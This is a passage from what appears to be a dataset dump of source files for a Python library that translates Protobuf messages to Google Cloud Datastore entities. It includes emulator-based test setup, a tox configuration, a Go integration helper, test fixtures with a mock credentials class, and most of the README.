os.environ['DATASTORE_PROJECT_ID'] = 'translator-tests'\n os.environ['DATASTORE_EMULATOR_HOST'] = 'localhost:8081'\n os.environ['DATASTORE_EMULATOR_HOST_PATH'] = 'localhost:8081/datastore'\n os.environ['DATASTORE_HOST'] = 'http://localhost:8081'\n\n # 1. Verify datastore emulator is running\n try:\n requests.get(os.environ['DATASTORE_HOST'], timeout=1)\n except requests.exceptions.ConnectionError as e:\n raise ValueError('Can\\'t reach \"%s\". Make sure Google Cloud Datastore emulator is '\n 'running and listening on \"%s\": %s.\\n\\nYou can start emulator using \"%s\" '\n 'command.' % (os.environ['DATASTORE_HOST'],\n os.environ['DATASTORE_EMULATOR_HOST'], str(e),\n START_EMULATOR_STRING))\n\n # Instantiate client with mock credentials object\n self.client = datastore.Client(credentials=EmulatorCreds(),\n _http=requests.Session())\n self._clear_datastore()\n\n def tearDown(self):\n # type: () -> None\n super(BaseDatastoreIntegrationTestCase, self).tearDown()\n\n self._clear_datastore()\n\n def _clear_datastore(self):\n # type: () -> None\n # Clear datastore, ensure it's empty\n query = self.client.query(kind='__kind__')\n query.keys_only()\n\n kinds = [entity.key.id_or_name for entity in query.fetch()]\n\n for kind in kinds:\n query = self.client.query(kind=kind)\n query.keys_only()\n\n # Work around for eventual consistency nature of the emulator\n for index in range(0, 3):\n entity_keys = [entity.key for entity in query.fetch()]\n self.client.delete_multi(entity_keys)\n time.sleep(0.1)\n\n query = self.client.query(kind=kind)\n query.keys_only()\n result = list(query.fetch())\n\n self.assertEqual(len(result), 0)\n" }, { "alpha_fraction": 0.7064586281776428, "alphanum_fraction": 0.7322205901145935, "avg_line_length": 31.42352867126465, "blob_id": "23fa435d158de16c4f6cb0ff523260d4e64fca76", "content_id": "2b256270afbae58186f1e99bffaa48ebe46df455", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 2756, "license_type": "permissive", "max_line_length": 141, "num_lines": 85, "path": "/tox.ini", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "[tox]\nenvlist = lint,py{2.7,3.6,3.7}-unit-tests,py2.7-integration-tests,py3.7-integration-tests,coverage,py{2.7,3.6,3.7}-benchmarks\nskipsdist = false\n\n[testenv]\nbasepython =\n {py3.7-unit-tests,py3.7-integration-tests,lint,mypy,coverage}: python3.7\n {py2.7-unit-tests,py2.7-integration-tests,py2.7-benchmarks}: python2.7\n {py3.6-unit-tests,py3.6-benchmarks}: python3.6\n {py3.7-unit-tests,py3.7-benchmarks}: python3.7\ninstall_command = pip install -U --force-reinstall {opts} {packages}\ndeps = -r requirements-test.txt\n -r requirements.txt\nsetenv =\n PYTHONPATH = {toxinidir}:{toxinidir}/tests/generated/\nwhitelist_externals =\n rm\n scripts/run-benchmarks.sh\ncommands =\n py.test --benchmark-disable -vv --durations=5 tests/unit/\n\n[testenv:lint]\ndeps = -r requirements-test.txt\n -r requirements-examples.txt\n -r requirements.txt\n mypy==0.730\n mypy-protobuf\ncommands =\n flake8 --config ./lint-configs/.flake8 protobuf_cloud_datastore_translator/ tests/ examples/\n pylint -E --rcfile=./lint-configs/.pylintrc protobuf_cloud_datastore_translator/ tests/ examples/\n mypy --no-incremental --config-file lint-configs/mypy.ini protobuf_cloud_datastore_translator/ tests/unit/ tests/integration/\n\n[testenv:mypy]\ndeps = -r requirements-test.txt\n -r requirements.txt\n mypy==0.730\n mypy-protobuf\ncommands =\n mypy --no-incremental --config-file lint-configs/mypy.ini protobuf_cloud_datastore_translator/ tests/unit/ tests/integration/ examples/\n\n[testenv:py2.7-integration-tests]\ncommands =\n py.test --benchmark-disable -vv --durations=5 tests/integration/\n\n[testenv:py3.7-integration-tests]\ncommands =\n py.test --benchmark-disable -vv --durations=5 tests/integration/\n\n[testenv:coverage]\ncommands =\n rm -f .coverage\n py.test --benchmark-disable --cov=protobuf_cloud_datastore_translator --cov=tests tests/unit/ tests/integration/ tests/test_benchmarks.py\n\n[testenv:coverage-travis]\npassenv = TOXENV CI TRAVIS TRAVIS_*\nset-env =\ncommands =\n rm -f .coverage\n py.test --benchmark-disable --cov=protobuf_cloud_datastore_translator tests/unit/ tests/integration/ tests/test_benchmarks.py\n codecov\n\n# Benchmark targets\n[testenv:py2.7-benchmarks]\ncommands =\n py.test --benchmark-autosave tests/test_benchmarks.py\n\n[testenv:py3.6-benchmarks]\ncommands =\n py.test --benchmark-autosave tests/test_benchmarks.py\n\n[testenv:py3.7-benchmarks]\ncommands =\n py.test --benchmark-autosave tests/test_benchmarks.py\n\n[testenv:py2.7-benchmarks-travis]\ncommands =\n {toxinidir}/scripts/run-benchmarks.sh\n\n[testenv:py3.6-benchmarks-travis]\ncommands =\n {toxinidir}/scripts/run-benchmarks.sh\n\n[testenv:py3.7-benchmarks-travis]\ncommands =\n {toxinidir}/scripts/run-benchmarks.sh\n" }, { "alpha_fraction": 0.6974021196365356, "alphanum_fraction": 0.6977680325508118, "avg_line_length": 32.74074172973633, "blob_id": "6b38eb75a5ea9b3999255855cc6b45f6c4283dad", "content_id": "d995cdc90458a98d86634fd9c2ab535f819301df", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 2733, "license_type": "permissive", "max_line_length": 115, "num_lines": 81, "path": "/tests/integration/go/go-put-get-db-model.go", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "package main\n\nimport (\n\t\"cloud.google.com/go/datastore\"\n\t\"context\"\n\t\"encoding/json\"\n\t\"flag\"\n\t\"github.com/Kami/python-protobuf-cloud-datastore-entity-translator/tests/generated/go/compat\"\n\ttranslator \"github.com/Sheshagiri/go-protobuf-cloud-datastore-entity-translator/datastore-translator\"\n\t\"github.com/golang/protobuf/jsonpb\"\n\t\"log\"\n\t\"os\"\n)\n\nfunc main() {\n\ttyp := flag.String(\"operation\", \"put/get\", \"put or get from from datastore\")\n\tprimaryKey := flag.String(\"primary-key\", \"\", \"primary key, this will be used as Name in Datastore Key, ex: key-1\")\n\tjsonFile := flag.String(\"fixture-path\", \"\", \"path to json file containing protobuf\")\n\n\tflag.Parse()\n\n\tctx := context.Background()\n\n\tprojectId := os.Getenv(\"DATASTORE_PROJECT_ID\")\n\n\tif projectId == \"\" {\n\t\tprojectId = \"translator-tests\"\n\t}\n\n\tdsClient, err := datastore.NewClient(ctx, projectId)\n\n\tif err != nil {\n\t\tlog.Fatalf(\"unable to connect to datastore, error: %v\", err)\n\t}\n\tdefer dsClient.Close()\n\n\ttranslatedProto := &example_compat.ExampleCompatDBModel{}\n\tkind := \"ExampleCompatDBModel\"\n\n\tif *typ == \"get\" {\n\t\tkey := datastore.NameKey(kind, *primaryKey, nil)\n\t\tlog.Println(\"getting key from datastore: \", key.String())\n\t\tdsEntity, err := dsClient.GetEntity(ctx, key)\n\t\tif err != nil {\n\t\t\tlog.Fatalf(\"unable to get from datastore, error: %v\", err)\n\t\t}\n\t\terr = translator.DatastoreEntityToProtoMessage(dsEntity, translatedProto, true)\n\t\t// We want to use original field names and not CamelCase ones\n\t\tmarshaller := jsonpb.Marshaler{OrigName: true, EmitDefaults: true}\n\t\tlog.Println(\"dumping the proto message to stdout\")\n\t\terr = marshaller.Marshal(os.Stdout, translatedProto)\n\t\tprettyJson, err := json.MarshalIndent(translatedProto, \"\", \" \")\n\t\tlog.Printf(\"%s\", string(prettyJson))\n\t} else if *typ == \"put\" {\n\t\tdata, err := os.Open(*jsonFile)\n\t\tif err != nil {\n\t\t\tlog.Printf(\"unable to read file %s, error: %v\", *jsonFile, err)\n\t\t}\n\t\terr = jsonpb.Unmarshal(data, translatedProto)\n\t\tif err != nil {\n\t\t\tlog.Printf(\"unmarshalling failed, error: %v\", err)\n\t\t}\n\t\tlog.Println(\"Original Proto: \", translatedProto)\n\t\tif err != nil {\n\t\t\tlog.Fatalf(\"unable to load json, error: %v\", err)\n\t\t}\n\t\ttranslatedEntity, err := translator.ProtoMessageToDatastoreEntity(translatedProto, true)\n\t\tlog.Println(\"Translated Entity:\", translatedEntity)\n\t\tif err != nil {\n\t\t\tlog.Fatalf(\"unable to translate execution request to datastore format, error: %v\", err)\n\t\t}\n\t\tkey := datastore.NameKey(kind, *primaryKey, nil)\n\t\t_, err = dsClient.PutEntity(ctx, key, &translatedEntity)\n\t\tif err != nil {\n\t\t\tlog.Fatalf(\"unable to translate execution request to datastore format, error: %v\", err)\n\t\t}\n\t\tlog.Printf(\"key %v is saved to datastore\", key.String())\n\t} else {\n\t\tlog.Fatalf(\"unknown type %s\", *typ)\n\t}\n}\n" }, { "alpha_fraction": 0.5561617612838745, "alphanum_fraction": 0.6135689616203308, "avg_line_length": 30.34200668334961, "blob_id": "d51b3fe4ecdcfa99bd4538e8536ddf13fd2e29ad", "content_id": "58d7548f3ae1a316c26a884b340045676cf6f470", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8443, "license_type": "permissive", "max_line_length": 93, "num_lines": 269, "path": "/tests/mocks.py", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Copyright 2019 Tomaz Muraus\n# Copyright 2019 Extreme Networks, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport datetime\n\nimport google.auth\nimport pytz\nfrom google.type import latlng_pb2\nfrom google.protobuf import struct_pb2\nfrom google.cloud.datastore.helpers import GeoPoint\n\nfrom tests.generated import example_pb2\nfrom tests.generated import example_with_options_pb2\n\n__all__ = [\n 'EXAMPLE_DICT_POPULATED',\n 'EXAMPLE_DICT_DEFAULT_VALUES',\n\n 'EXAMPLE_PB_POPULATED',\n 'EXAMPLE_PB_DEFAULT_VALUES',\n\n 'EXAMPLE_PB_WITH_OPTIONS_1',\n\n 'EmulatorCreds'\n]\n\ndt = datetime.datetime(2019, 12, 12, 10, 00, 00, tzinfo=pytz.UTC)\n\n# Dictionary with example data which can be used with the Entity object\nEXAMPLE_DICT_POPULATED = {\n 'int32_key': 100,\n 'string_key': u'foo bar baz',\n 'bool_key': True,\n 'bytes_key': b'foobytesstring',\n 'double_key': 1.2345,\n 'float_key': float(20.55500030517578),\n 'int64_key': 9223372036854775,\n 'map_string_string': {\n 'foo': u'bar',\n 'bar': u'baz',\n 'unicode': u'čđć'\n },\n 'map_string_int32': {\n 'key1': 20,\n 'key2': 30,\n },\n 'string_array_key': [u'item1', u'item2'],\n 'int32_array_key': [100, 200, 300],\n 'bytes_array_key': [b'a', b'b', b'c'],\n 'complex_array_key': [\n {'string_key': u'value 1', 'int32_key': 12345,\n 'enum_key': example_pb2.ExampleEnumModel.ENUM2},\n {'string_key': u'value 2', 'int32_key': 5000,\n 'enum_key': example_pb2.ExampleEnumModel.ENUM0},\n {'string_key': u'value 3', 'int32_key': 40,\n 'enum_key': example_pb2.ExampleEnumModel.ENUM0},\n ],\n 'struct_array_key': [\n {\n 'key1': u'value 1',\n 'key2': [1, 2, 3],\n 'key3': 3333,\n 'key4': {\n 'a': 1\n }\n },\n {\n 'key11': u'value 10',\n 'key12': [10, 11, 12],\n 'key13': 4444,\n 'key14': {\n 'a': 1\n }\n }\n ],\n 'enum_key': example_pb2.ExampleEnumModel.ENUM1,\n 'struct_key': {\n 'key1': u'val1',\n 'key2': 2,\n 'key3': [1, 2, 3, 4.44, None, True, False],\n 'key4': u'čđć',\n 'key5': {\n 'dict_key_1': u'1',\n 'dict_key_2': 30,\n 'dict_key_3': [u'a', u'b', u'c', 7, {u'h': u'bar', u'g': [1, 2, 33.33], u'j': [],\n u'l': True, u'm': False}, None],\n 'dict_key_4': None,\n 'dict_key_5': 55.55\n },\n 'key6': None,\n 'key7': [],\n 'key8': {\n 'a': {\n 'b': {\n 'c': []\n }\n }\n },\n 'key9': True,\n 'key10': False,\n 'key11': 11.123\n },\n 'timestamp_key': dt,\n 'geo_point_key': GeoPoint(-20.2, +160.5),\n 'null_key': None\n}\ngeo_point_value = latlng_pb2.LatLng(latitude=-20.2, longitude=+160.5)\n\nEXAMPLE_DICT_DEFAULT_VALUES = {\n 'bool_key': False,\n 'string_key': u'',\n 'int32_key': 0,\n 'int64_key': 0,\n 'double_key': 0.0,\n 'float_key': 0.0,\n 'enum_key': example_pb2.ExampleEnumModel.ENUM0,\n 'bool_key': False,\n 'bytes_key': b'',\n 'null_key': None,\n 'map_string_string': {},\n 'map_string_int32': {},\n 'string_array_key': [],\n 'int32_array_key': [],\n 'bytes_array_key': [],\n 'complex_array_key': [],\n 'struct_array_key': []\n}\n\n# pylint: disable=no-member\nstruct1_pb = struct_pb2.Struct()\nstruct1_pb.update({\n 'key1': u'value 1',\n 'key2': [1, 2, 3],\n 'key3': 3333,\n 'key4': {\n 'a': 1\n }\n})\n\nstruct2_pb = struct_pb2.Struct()\nstruct2_pb.update({\n 'key11': u'value 10',\n 'key12': [10, 11, 12],\n 'key13': 4444,\n 'key14': {\n 'a': 1\n }\n})\n\nEXAMPLE_PB_POPULATED = example_pb2.ExampleDBModel()\nEXAMPLE_PB_POPULATED.int32_key = 100\nEXAMPLE_PB_POPULATED.string_key = u'foo bar baz'\nEXAMPLE_PB_POPULATED.bool_key = True\nEXAMPLE_PB_POPULATED.bytes_key = b'foobytesstring'\nEXAMPLE_PB_POPULATED.double_key = 1.2345\nEXAMPLE_PB_POPULATED.float_key = float(20.55500030517578)\nEXAMPLE_PB_POPULATED.int64_key = 9223372036854775\nEXAMPLE_PB_POPULATED.map_string_string['foo'] = u'bar'\nEXAMPLE_PB_POPULATED.map_string_string['bar'] = u'baz'\nEXAMPLE_PB_POPULATED.map_string_string['unicode'] = u'čđć'\nEXAMPLE_PB_POPULATED.map_string_int32['key1'] = 20\nEXAMPLE_PB_POPULATED.map_string_int32['key2'] = 30\nEXAMPLE_PB_POPULATED.string_array_key.append(u'item1')\nEXAMPLE_PB_POPULATED.string_array_key.append(u'item2')\nEXAMPLE_PB_POPULATED.enum_key = example_pb2.ExampleEnumModel.ENUM1\nEXAMPLE_PB_POPULATED.int32_array_key.append(100)\nEXAMPLE_PB_POPULATED.int32_array_key.append(200)\nEXAMPLE_PB_POPULATED.int32_array_key.append(300)\nEXAMPLE_PB_POPULATED.bytes_array_key.append(b'a')\nEXAMPLE_PB_POPULATED.bytes_array_key.append(b'b')\nEXAMPLE_PB_POPULATED.bytes_array_key.append(b'c')\nEXAMPLE_PB_POPULATED.struct_array_key.append(struct1_pb)\nEXAMPLE_PB_POPULATED.struct_array_key.append(struct2_pb)\n\nexample_placeholder_pb1 = example_pb2.ExampleNestedModel(string_key=u'value 1',\n int32_key=12345, enum_key=example_pb2.ExampleEnumModel.ENUM2)\nexample_placeholder_pb2 = example_pb2.ExampleNestedModel(string_key=u'value 2',\n int32_key=5000, enum_key=example_pb2.ExampleEnumModel.ENUM0)\nexample_placeholder_pb3 = example_pb2.ExampleNestedModel(string_key=u'value 3',\n int32_key=40, enum_key=example_pb2.ExampleEnumModel.ENUM0)\n\nEXAMPLE_PB_POPULATED.complex_array_key.append(example_placeholder_pb1)\nEXAMPLE_PB_POPULATED.complex_array_key.append(example_placeholder_pb2)\nEXAMPLE_PB_POPULATED.complex_array_key.append(example_placeholder_pb3)\n\nEXAMPLE_PB_POPULATED.timestamp_key.FromDatetime(dt)\nEXAMPLE_PB_POPULATED.struct_key.update({\n 'key1': u'val1',\n 'key2': 2,\n 'key3': [1, 2, 3, 4.44, None, True, False],\n 'key4': u'čđć',\n 'key5': {\n 'dict_key_1': u'1',\n 'dict_key_2': 30,\n 'dict_key_3': [u'a', u'b', u'c', 7, {u'h': u'bar', u'g': [1, 2, 33.33], u'j': [],\n u'l': True, u'm': False}, None],\n 'dict_key_4': None,\n 'dict_key_5': 55.55\n },\n 'key6': None,\n 'key7': [],\n 'key8': {\n 'a': {\n 'b': {\n 'c': []\n }\n }\n },\n 'key9': True,\n 'key10': False,\n 'key11': 11.123\n})\n\ngeo_point_value = latlng_pb2.LatLng(latitude=-20.2, longitude=+160.5)\nEXAMPLE_PB_POPULATED.geo_point_key.CopyFrom(geo_point_value)\n\n# Ezample object which explicitly provides values for all the fields which are the same as\n# the default values\nEXAMPLE_PB_DEFAULT_VALUES = example_pb2.ExampleDBModel()\nEXAMPLE_PB_DEFAULT_VALUES.bool_key = False\nEXAMPLE_PB_DEFAULT_VALUES.string_key = ''\nEXAMPLE_PB_DEFAULT_VALUES.int32_key = 0\nEXAMPLE_PB_DEFAULT_VALUES.int64_key = 0\nEXAMPLE_PB_DEFAULT_VALUES.double_key = 0.0\nEXAMPLE_PB_DEFAULT_VALUES.float_key = 0.0\nEXAMPLE_PB_DEFAULT_VALUES.enum_key = example_pb2.ExampleEnumModel.ENUM0\nEXAMPLE_PB_DEFAULT_VALUES.bool_key = False\nEXAMPLE_PB_DEFAULT_VALUES.bytes_key = b''\nEXAMPLE_PB_DEFAULT_VALUES.null_key = 0\nEXAMPLE_PB_DEFAULT_VALUES.struct_key.update({})\n# pylint: enable=no-member\n\nEXAMPLE_PB_WITH_OPTIONS_1 = example_with_options_pb2.ExampleDBModelWithOptions1()\nEXAMPLE_PB_WITH_OPTIONS_1.string_key_one = 'one'\nEXAMPLE_PB_WITH_OPTIONS_1.string_key_two = 'two'\nEXAMPLE_PB_WITH_OPTIONS_1.string_key_three = 'three'\nEXAMPLE_PB_WITH_OPTIONS_1.string_key_four = 'four'\nEXAMPLE_PB_WITH_OPTIONS_1.int32_field_one = 100000000\nEXAMPLE_PB_WITH_OPTIONS_1.int32_field_two = 200000000\n\n\nclass EmulatorCreds(google.auth.credentials.Credentials):\n \"\"\"\n Mock credential class to be used with the Python Datastore client.\n \"\"\"\n\n def __init__(self):\n self.token = b'secret'\n self.expiry = None\n\n @property\n def valid(self):\n return True\n\n def refresh(self, _):\n pass\n" }, { "alpha_fraction": 0.7610158920288086, "alphanum_fraction": 0.7713651061058044, "avg_line_length": 37.69778823852539, "blob_id": "f3d56427f074c50974987d86cf9353d1b5120908", "content_id": "325a776e96d3da652bfc3cc6db4161b0fdec80f7", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 15750, "license_type": "permissive", "max_line_length": 916, "num_lines": 407, "path": "/README.md", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "# Protobuf Message to Google Datastore Entity Protobuf Message Translator\n\n[![Tests Build Status](https://travis-ci.org/Kami/python-protobuf-cloud-datastore-entity-translator.svg?branch=master)](https://travis-ci.org/Kami/python-protobuf-cloud-datastore-entity-translator) [![Codecov](https://codecov.io/github/Kami/python-protobuf-cloud-datastore-entity-translator/badge.svg?branch=master&service=github)](https://codecov.io/github/Kami/python-protobuf-cloud-datastore-entity-translator?branch=master) [![](https://img.shields.io/pypi/v/protobuf-cloud-datastore-translator.svg)](https://pypi.org/project/protobuf-cloud-datastore-translator/) [![](https://img.shields.io/pypi/pyversions/protobuf-cloud-datastore-translator.svg)](https://pypi.org/project/protobuf-cloud-datastore-translator/) [![](https://img.shields.io/github/license/Kami/python-protobuf-cloud-datastore-entity-translator.svg)](https://github.com/Kami/python-protobuf-cloud-datastore-entity-translator/blob/master/LICENSE)\n\nThis library allows you to store arbitrary Protobuf message objects inside the Google Datastore.\n\nIt exposes methods for translating arbitrary Protobuf message objects to Entity Protobuf objects\nwhich are used by Google Datastore and vice-versa.\n\nIt supports all the native which are supported by the Google Datastore.\n\n## Why, Motivation\n\nIf you are working with Google Datastore from a single programming language you can utilize\none of the multiple Datastore ORMs for that programming language. Those ORMs allow you to define\nschema for your database models and work with them using native programming language types.\n\nThis approach brakes down when you want to work with the same set of datastore entities from\nmultiple programming language.\n\nThere are multiple solutions for that problem, but one approach is to define some kind of model\nschema which is programming language agnostic.\n\nAnd this library tries to do just that. It utilizes native protobuf message definitions as a schema\nfor database models. This way those definitions can be shared by multiple programming language and\neach language just needs a light translator library (like this one) which knows how to translate\narbitrary Protobuf object into Entity Protobuf object and vice-versa.\n\n## Features\n\nRight now the library supports the following Protobuf field types and functionality:\n\n* All the simple types (string, int32, int64, double, float, bytes, bool, enum)\n* Scalar / container types (map, repeated)\n* Complex types from Protobuf standard library (``google.protobuf.Timestamp``,\n ``google.protobuf.Struct``, ``google.types.LatLng``)\n* Using imports and referencing types from different Protobuf definition files. For example,\n you can have Protobuf message definition called ``Model1DB`` inside file ``model1.proto`` which\n has a field which references ``Model2DB`` from ``model2.proto`` file.\n\n For that to work, you need to make sure that the root directory which contains all the generated\n Protobuf Python files is available in ``PYTHONPATH``.\n\n For example, if generated files are written to ``my_app/generated/``, ``my_app/generated/`` needs\n to be in ``PYTHONPATH`` and this directory needs to be a Python package (it needs to contain\n ``__init__.py`` file).\n\nFor more information on the actual types supported by Google Datastore, refer to\nhttps://cloud.google.com/datastore/docs/concepts/entities#properties_and_value_types.\n\n## Supported Python versions\n\n* Python 2.7\n* Python 3.6\n* Python 3.7\n\nIt may also work with Python 3.4 and 3.5, but we don't test against those versions.\n\n## Usage\n\nThis library exposes three main public methods.\n\n### ``model_pb_to_entity_pb(model_pb, exclude_falsy_values=False, exclude_from_index=None)``\n\nThis method converts arbitrary Protobuf message objects to the Entity Protobuf object which can\nbe used with Google Datastore.\n\nFor example:\n\n```python\nfrom google.cloud import datastore\nfrom google.protobuf.timestamp_pb2 import Timestamp\n\nfrom protobuf_cloud_datastore_translator import model_pb_to_entity_pb\n\nfrom generated.protobuf.models import my_model_pb2\n\n# 1. Store your database model object which is represented using a custom Protobuf message class\n# instance inside Google Datastore\n\n# Create database model Protobuf instance\nmodel_pb = my_model_pb2.MyModelDB()\n# Other entity attributes\nmodel_pb.key1 = 'value1'\nmodel_pb.key2 = 200\nmodel_pb.parameters['foo'] = 'bar'\nmodel_pb.parameters['bar'] = 'baz'\n\nstart_time_timestamp = Timestamp()\nstart_time_timestamp.GetCurrentTime()\n\nmodel_pb.start_time = start_time_timestamp\n\n# Convert it to Entity Protobuf object which can be used with Google Datastore\nentity_pb = model_pb_to_entity_pb(model_pb)\n\n# Store it in the datastore\nclient = Client(...)\nkey = self.client.key('MyModelDB', 'some_primary_key')\nentity_pb_translated.key.CopyFrom(key.to_protobuf())\nentity = datastore.helpers.entity_from_protobuf(entity_pb)\nclient.put(entity)\n```\n\n### ``model_pb_with_key_to_entity_pb(client, model_pb, exclude_falsy_values=False, exclude_from_index=None)``\n\nAs a convenience, this library also exposes ``model_pb_to_entity_pb`` method. This method assumes\nthere is a special ``key`` string field on your Protobuf message which will act as an Entity\nprimary key.\n\nUnderneath, this method infers ``project_id`` and ``namespace_id`` parts of the Entity composite\nprimary key from the ``client`` object which is passed to this method. Entity ``kind`` is inferred\nfrom the Protobuf message model name. For example, if the Protobuf message model name is\n``UserInfoDB``, entity kind would be set to ``UserInfoDB``.\n\nFor example:\n\n```python\nfrom google.cloud import datastore\n\nfrom protobuf_cloud_datastore_translator import model_pb_to_entity_pb\n\nmodel_pb = my_model_pb2.MyModelDB()\nmodel_pb.key = 'key-1234'\n# set model fields\n# ...\n\nclient = Client(project='my-project', namespace='my-namespace')\n\nentity_pb = model_pb_to_entity_pb(model_pb)\n\n# Store it in the datastore\nentity = datastore.helpers.entity_from_protobuf(entity_pb)\nclient.put(entity)\n\n# In this scenario, actual key would look the same if you manually constructed it like this:\nkey = client.key('MyModelDB', 'key-1234', project='my-project', namespace='my-namespace')\n```\n\n### ``entity_pb_to_model_pb(model_pb_class, entity_pb, strict=False)``\n\nThis method converts raw Entity Protobuf object as returned by the Google Datastore to provided\nProtobuf message class.\n\nBy default, fields which are found on the Datastore Entity Protobuf object, but not on the\nProtobuf message class are ignored. If you want an exception to be thrown in such scenario, you\ncan pass ``strict=True`` argument to the method.\n\nFor example:\n\n```python\nkey = client.key('MyModelDB', 'some_primary_key')\nentity = client.get(key)\nentity_pb = datastore.helpers.entity_to_protobuf(entity)\n\nmodel_pb = entity_pb_to_model_pb(my_model_pb2.MyModelPB, entity_pb)\nprint(model_pb)\n```\n\n## Excluding Protobuf Model Fields from Indexes\n\nBy default, Google Cloud Datstore automatically indexes each entity (model) property.\n\nIndexing each field (entity property) is usually not desired nor needed. It also has some\nlimitations (for example, size of a simple field which is to be indexed is limited to ``1500``\nbytes, etc.). In addition to that, uncessary indexing causes increased storage space consumption.\n\nThis library allows you to define which model fields to exclude from index on the field basis\nutilizing Protobuf field options extension.\n\nFor example:\n\n```protobuf\nsyntax = \"proto3\";\n\nimport \"google/protobuf/descriptor.proto\";\n\n// Custom Protobuf option which specifies which model fields should be excluded\n// from index\n// NOTE: Keep in mind that it's important not to change the option name\n// (\"exclude_from_index\") since this library uses that special option name to\n// determine if a field should be excluded from index.\nextend google.protobuf.FieldOptions {\n bool exclude_from_index = 50000;\n}\n\nmessage ExampleDBModelWithOptions1 {\n string string_key_one = 1 [(exclude_from_index) = true];\n string string_key_two = 2;\n string string_key_three = 3 [(exclude_from_index) = true];\n string string_key_four = 4;\n int32 int32_field_one = 5;\n int32 int32_field_two = 6 [(exclude_from_index) = true];\n}\n```\n\nIn this example, fields ``string_key_one``, ``string_key_three`` and ``int32_field_two`` won't be\nindexed (https://cloud.google.com/datastore/docs/concepts/indexes#unindexed_properties).\n\nIn this example, field option extension is defined in the same file where model is defined, but in\nreality you will likely define that extension inside a custom protobuf file (e.g\n``field_options.proto``) and include that file inside other files which contain your database model\ndefinitions.\n\nKeep in mind that if you define option extension inside a package, that package needs to match the\npackage under which the models are stored.\n\nFor example:\n\n1. ``protobuf/models/field_options.proto``:\n\n```protobuf\nsyntax = \"proto3\";\n\npackage models;\n\nimport \"google/protobuf/descriptor.proto\";\n\n// Custom Protobuf option which specifies which model fields should be excluded\n// from index\n// NOTE: Keep in mind that it's important not to change the option name\n// (\"exclude_from_index\") since this library uses that special option name to\n// determine if a field should be excluded from index.\nextend google.protobuf.FieldOptions {\n bool exclude_from_index = 50000;\n}\n```\n\n2. ``protobuf/models/my_model.proto``:\n\n```protobuf\nsyntax = \"proto3\";\n\npackage models;\n\nimport \"models/field_options.proto\";\n\nmessage ExampleDBModelWithOptions1 {\n string string_key_one = 1 [(exclude_from_index) = true];\n string string_key_two = 2;\n string string_key_three = 3 [(exclude_from_index) = true];\n string string_key_four = 4;\n int32 int32_field_one = 5;\n int32 int32_field_two = 6 [(exclude_from_index) = true];\n}\n```\n\n## Examples\n\nFor example Protobuf message definitions, see ``protobuf/`` directory.\n\nExample usage:\n\n```python\nfrom google.cloud import datastore\n\nfrom protobuf_cloud_datastore_translator import model_pb_to_entity_pb\nfrom protobuf_cloud_datastore_translator import entity_pb_to_model_pb\n\nfrom generated.protobuf.models import my_model_pb2\n\n# 1. Store your database model object which is represented using a custom Protobuf message class\n# instance inside Google Datastore\n\n# Create database model Protobuf instance\nmodel_pb = my_model_pb2.MyModelDB()\nmodel_pb.key1 = 'value1'\nmodel_pb.key2 = 200\n\n# Convert it to Entity Protobuf object which can be used with Google Datastore\nentity_pb = model_pb_to_entity_pb(model_pb)\n\n# Store it in the datastore\n# To avoid conversion back and forth you can also use lower level client methods which\n# work directly with the Entity Protobuf objects\n# For information on the low level client usage, see\n# https://github.com/GoogleCloudPlatform/google-cloud-datastore/blob/master/python/demos/trivial/adams.py#L66\nclient = Client(...)\nkey = self.client.key('MyModelDB', 'some_primary_key')\nentity_pb_translated.key.CopyFrom(key.to_protobuf())\n\nentity = datastore.helpers.entity_from_protobuf(entity_pb)\nclient.put(entity)\n\n# 2. Retrieve entity from the datastore and convert it to your Protobuf DB model instance class\n# Same here - you can also use low level client to retrieve Entity protobuf object directly and\n# avoid unnecessary conversion round trip\nkey = client.key('MyModelDB', 'some_primary_key')\nentity = client.get(key)\nentity_pb = datastore.helpers.entity_to_protobuf(entity)\n\nmodel_pb = entity_pb_to_model_pb(my_model_pb2.MyModelPB, entity_pb)\nprint(model_pb)\n```\n\n\n## Gotchas\n\n### Default values\n\nIn Protobuf syntax version 3 a concept of field being set has been removed and combined with a\nconcept of a default value. This means that even when a field is not set, a default value which\nis specific to that field type will be returned.\n\nAs far as this library is concerned, this means when you are converting / translating Protobuf\nobject with no values set, translated object will still contain default values for fields which\nare not set.\n\nFor example, the output / end result of both those two calls will be the same:\n\n```python\n# Field values are explicitly provided, but they match default values\nexample_pb = example_pb2.ExampleDBModel()\nexample_pb.bool_key = False\nexample_pb.string_key = ''\nexample_pb.int32_key = 0\nexample_pb.int64_key = 0\nexample_pb.double_key = 0.0\nexample_pb.float_key = 0.0\nexample_pb.enum_key = example_pb2.ExampleEnumModel.ENUM0\nexample_pb.bool_key = False\nexample_pb.bytes_key = b''\nexample_pb.null_key = 1\n\nentity_pb_translated = model_pb_to_entity_pb(example_pb)\nprint(entity_pb_translated)\n\n# No field values are provided, implicit default values are used during serialization\nexample_pb = example_pb2.ExampleDBModel()\nentity_pb_translated = model_pb_to_entity_pb(example_pb)\nprint(entity_pb_translated)\n```\n\nIf you don't want default values to be set on the translated Entity Protobuf objects and stored\ninside the datastore, you can pass ``exclude_falsy_values=True`` argument to the\n``model_pb_to_entity_pb`` method.\n\nFor details, see:\n\n* https://developers.google.com/protocol-buffers/docs/reference/python-generated\n* 